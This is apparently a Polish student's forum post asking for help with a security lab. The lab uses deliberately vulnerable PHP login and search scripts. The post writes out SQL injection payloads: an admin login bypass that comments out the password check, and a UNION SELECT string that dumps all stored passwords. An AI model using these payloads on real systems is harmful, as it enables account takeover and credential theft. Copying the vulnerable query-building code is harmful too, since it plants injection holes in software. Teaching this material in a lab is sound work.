dostałem do zrobienia ćwiczenia które mam wykonać na podstawie materiałów dołączonych do ćwiczeń. Jednak nie mogę zrobić dwóch zadań:
Pierwsze:
Używając skryptu P02.php zalogować się na konto admin wykorzystując komentowanie niechcianego fragmentu zapytania.
Skrypt P02.php;
<?php include('cfg.php'); $z="SELECT id FROM uzytkownicy WHERE login='$login' AND haslo='$haslo'"; ?>
cfg.php to tylko połączenie z bazą.
Według materiałów powinno to zostać zrobione mniej więcej tak zapytanie w P02.php powinniśmy zmienić na:
a w przeglądarce internetowej powinniśmy wpisać htp://adres/lokalizacja/nazwa_skryptu.php?login=admin'/* (oczywiście powinny być dwa "t" w http.)
SELECT id FROM użytkownicy WHERE login =’/*
Drugie zadanie:
Wykorzystując umiejętności z poprzednich zadań oraz funkcję PHP concat, a także skrypt P04.php wydobyć z bazy wszystkie loginy i hasła znajdujące się w bazie MySQL.
Skrypt P04.php:
<?php include('cfg.php'); $z="SELECT login FROM uzytkownicy WHERE login LIKE '$login%' LIMIT 2"; } ?>
według materiałów powinno to zostać zrobione tak, zapytanie w skrypcie P04.php zamieniamy na:
SELECT login FROM użytkownicy WHERE login LIKE ’%’ AND 1=2 UNION SELECT haslo from uzytkownicy /* LIMIT 2
a w przeglądarkę wpisujemy htp://adres/lokalizacja/nazwa_skryptu.php?login=%' and 1=2 union select haslo from
uzytkownicy /*
Proszę o wskazówki co robię nie tak.